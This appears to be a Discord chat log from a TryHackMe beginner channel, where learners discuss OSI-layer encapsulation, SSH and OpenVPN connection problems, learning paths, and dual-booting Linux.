the en/decapsulation just deals with this outer header

ruby yew
#

Yeah, so layer 2 has all these information. Mac header, IP HEADER, tcp header,data.
So Layer 2 has IP address as well right? I mean the further encapsulated down the layer (Layer 7 --> 1). Level 1 has the most information.

sand sonnet
#

"layer 2" referse to this mac header

#

so it only has the mac address (and some other stuff)

#

all the data including and beyond the ip header is called a "packet"

ruby yew
#

I found this online, and it seems more info at the bottom layers

sand sonnet
#

it is very confusing how its diagrammed and how they name things

#

the diagram represents them adding or removing headers

#

the whole message is the bottom one

#

each layer has a separate header that gets added

ruby yew
#

Yeah Layer 7 ----> 1 (Encapsulation) adding header to the data
Layer 1 ---> 7 (Decapsulation) removing header from the data.

sand sonnet
#

yup

ruby yew
#

So back to this sentence from the room:
""A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses"

It's false right?

sand sonnet
#

does this help?

ruby yew
#

it does have IP address in layer 2

#

and it has everything in layer 1

sand sonnet
#

mac has mac address

#

ip has ip address

#

two separate addresses in two separate headers

ruby yew
#

Yes, even from your diagram. I can clearly see "IP header" in data link layer

#

it has both mac and ip addresses

sand sonnet
#

right ok

ruby yew
sand sonnet
#

i understand the confusion

ruby yew
#

Stated that no IP address information on layer 2. Which is wrong...

sand sonnet
#

the data sent to something looking at the layer 2 will also contain more data with the ip address

#

but a layer 2 device only looks at the layer 2 header and passes everything else on

#

so it doesn't see the ip address

#

only the mac address (although it theoretically could look at the ip address)

ruby yew
#

oh so I guess we have to look from the device point of view? The layer 2 device (e.g: a switch) can't see the ip address even though it's there, it can only see the mac address. Am I right?

sand sonnet
#

yes

#

it only looks at the layer 2 header and ignores everything else

ruby yew
#

Ok, so I have to focus on the first header only, then I think it'll make sense then

sand sonnet
#

the idea is that the headers get added on one by one or taken off and looked at one by one where the header usually corresponds to the layer in some model

ruby yew
#

Ok thanks, I think I start to get it

sand sonnet
#

nice

wanton flicker
#

Please I'm new on here and I'm here to learn hacking

#

I'm new beginner and I want to know what to start now

sand sonnet
#

what have you done already?

ashen nexus
gloomy steeple
# sand sonnet a program basically sends some application data to other programs or to the oper...

Hey, thanks for your answer!
I new for the manually crafted packets, as I coded a basic arp-spoofer before.
I was mostly curious about what/software does what in a normal working scenario.

So if we resume Application/Presentation are usually taken care of by the main program running,

Session, and transport layer would be taken care off by the OS

Network and datalink would be handled by the network card? (wireless or not?)

Then the router would take care of the physical layer?

somber currentBOT
#

Gave +1 Rep to @sand sonnet

sand sonnet
#

You could also look at the room "Protocols and servers"

gloomy steeple
south robin
#

I'm looking for a team to study together yeet

marsh veldt
#

What's going on guys

My friends and I are looking to participate in our first CTF
Do you have any suggestion regarding where to start and which one to begin with?

gloomy steeple
marsh veldt
#

Great, thank you

trail saddle
#

hi

vagrant hinge
#

finally im finished with this path

marsh veldt
vagrant hinge
somber currentBOT
#

Gave +1 Rep to @drowsy cargo

tribal mango
#

wow i have to say it's really hard to get all the stuff after just learning once

marsh veldt
#

The whole topic of network layers can be discussed for hours and hours (hence why there is a great book about it I'd recommend named Computer Networks: A Top-Down Approach)

#

My best advice is do not try to learn everything after one time, most themes will be recurring. Take it a step of a time and don't be ashamed of going back to revise previous materials and always go make your own research, don't just read the room.

tribal mango
#

i'm really frustrated that i have learnt the whole network stuff in college, but when i relearn those things i still can't remember them well😭

#

moreover, it will still be exiting if i can get something new when i relearn, but it doesn't

#

i just repeat those easy stuff over and over, and still not get the really start of the whole pentesting or cyber security stuff

marsh veldt
#

Perhaps focus on what helps you learn and your particular style.

#

Not everyone is same, so you should adapt the material to the way that best helps you.

potent wedge
forest heart
marsh veldt
#

Morning

#

I have a question

#

im currently learning linux OS and learning ssh

#

so in the linux on the browser I can enter to their server like this
tryhackme@10.10.62.118 and it works !!

#

but when i use this command on my VM kali linux machine it not work why ??

soft snow
marsh veldt
#

oh

#

NO

#

can I ask why this is important?

#

oh wait don't tell me

#

I will search so I can find it by my own to improve my knowledge

soft snow
marsh veldt
#

@soft snow I downloaded By sudo apt install openvpn but i can't find it in the downloads file?

#

I tried also to go to downloads file then install it again but with no use

soft snow
#

Regardless, if you install it, it's not in your downloads folder, it's just installed then.
So you can directly use it as a command

marsh veldt
#

I have to locate the path tho

#

sudo openvpn /path/to/file.ovpn

#

i need the path

soft snow
marsh veldt
#

ummmmmmmmmm

#

yeah sure i will

#

give me a minute

#

I need some stuff to my kali Like google chrome first 😂

marsh veldt
#

@soft snow it worked, Thanks

somber currentBOT
#

Gave +1 Rep to @soft snow

cursive plume
#

Oh no. I had a 50 day streak but I totally forgot to answer some questions today. Back to 0. 😦

#

I'm at 85% of this learning path though. Hope to wrap it up soon.

hot portal
#

I never have an easy or a good time due to the amount of trouble I run into every single time I try a course ! I am doing the “intro to offensive security” course rn. I am on the terminal and I cannot get gobuster running. It says (Unable to locate package gobuster) shouldn’t (tryhackme) have it pre installed or do I really have to install it on my computer?

#

Never mind I found my problem

harsh iron
#

After i complete one component of this path am i required to be a paid subscriber to continue ?

small spire
harsh iron
#

Oh true.......

#

How about boxes ?

small spire
#

80% free

harsh iron
#

Nice......

tight ingot
#

There is plenty of free boxes.

#

You can go to Learn > Search and filter out free boxes.

harsh iron
#

Nice.........

tight ingot
#

I do suggest the sub though, it's cheaper than a yearly sub of Netflix.

#

and you learn.

#

Win/win.

misty oasis
#

I’ve been doing tryhackme but whenever i’m on the discord people are bringing up things that i have yet to hear about. When do i start using the terminal and learning about different commands and using them? is that in the junior pen pathway, and if so, should i start it after i finish this one?

soft snow
misty oasis
#

ok, thankyou!! @soft snow

paper frigate
#

Suuuupp

tribal mango
#

a tough week

#

how to be less anxious

#

kill me

simple lance
#

Anyone from netherlands here? Pm me

cursive plume
stark rain
ebon talon
#

Hey I have a question, after completing pre-security and intro-to-cyber-security, should one go for Complete beginner path or jr. Pentester path? Please let me know about this

potent wedge
ebon talon
#

Okay thank you so much @trail flame @potent wedge .

somber currentBOT
#

Gave +1 Rep to @trail flame

potent wedge
#

no problem

somber currentBOT
#

Gave +1 Rep to @potent wedge

potent wedge
#

YAY rep points for shadow thanks to lassi

timid surge
#

Good Evening All! I'm new to the THM community and currently working on the pre-security path.

#

My questions is during linux essentials 1 it is mentioned to check out the find command THM room. However I believe this room was made private. Is there anyway to access it?

stark rain
timid surge
#

I do have a subscription. When I went to find the room it says it was private.

#

It says the owner has made the room private. So I’m assuming it won’t be available anymore?

stark rain
#

can you provide link

#

take screenshot of that private area to check it

ebon talon
stark rain
ebon talon
stark rain
ebon talon
#

gobuster vs ffuf, which one shall I learn in depth? Which one is better?

ebon talon
#

alright, thank you.

ebon talon
#

I have a very specific question, I have a half year experience with ubuntu and by now I've completed bash scripting too. I want to dual boot my system with a linux distro but I'm confused . You see I want to be a system administrator and a penetration tester both, so considering both together , which distro shall I choose ?if somebody happens to have a suggestion then please let me.

#

They say fedora , centos both are good for system administrators and parrot os and Kali is good for Penetration tester but I have to choose one, so which one shall I go with?

ebon talon
small spire
#

there's also a ton of more stuff that dual-booting offers imo, the people who're so much against it, havn't used it for more than a month to feel it's perks afaik

#

what made you dislike linux from dual-booting, it just amplifies the stuff I like about linux

#

gaming and some specific software(adobe, matlab) aside, I'd switch over completely

#

yeh, I don't use my windows a lot, but if you have to switch more, staying on windows can be easier

#

yeh, that happened with me too, I think, random grub rescue terminal and boot order messing up but it's all part of the experience

ebon talon
#

Okay then I've decided to switch entirely to ubuntu and put my windows license on vm (I want to keep my windows too). I'll do that in august, my college happens to have 3 consecutive holidays in that month, so that is when I'll do it. Thank you @trail flame @small spire

somber currentBOT
#

Gave +1 Rep to @trail flame

somber currentBOT
#

Gave +1 Rep to @small spire

ebon talon
#

yes OneNote and MS office

#

the enetire ms office suite I mean

small spire
#

making a windows vm is a pain on your resources, it needs 60 GB storage at least, and is generally a pain to work with for bigger projects imo

ebon talon
#

Oh no that's not good.

#

what if I give 120 GB of storage, 6 GB RAM and 2 cores and 124MB VRAM?

#

will it be enough for a windows 10 on vm?

small spire
#

👀

#

if you have that, yeh, that'll work

ebon talon
#

Okay then thank you.PeepoLove

timid surge
#

is anyone getting a ssh connection time out error?

#

I'm logged into the THM server, says im connected, but i cant connect to the machine via ssh

#

port 22: Connection timed out

#

I've never had any issues in the past (new member here. only been at it for a week or so)

timid surge
#

the nmap room

#

no one did. I just like to get the reps in to practice different nmap comands 🙂

timid surge
#

thank you for the response Iassi

true pike
#

hello everyone this gonna sound lame but i am looking for a mentor, if someone is interested in helping me i would appreciate and be very grateful

last schooner
true pike
#

@last schooner thank you

somber currentBOT
#

Gave +1 Rep to @last schooner

last schooner
true pike
#

@last schooner i cant find that channel in text only voice

#

could you help ,me

last schooner
#

You can click on this one that i posted here and it will redirect you there

true pike
#

i click but do nothing

last schooner
#

Hmm maybe it's because you are not verified

#

!docs verify

rain berryBOT
last schooner
#

Follow the instructions in the link above to verify with the discord bot

#

and try after to click on that channel that i posted

true pike
#

ok

#

thank you

last schooner
#

no worries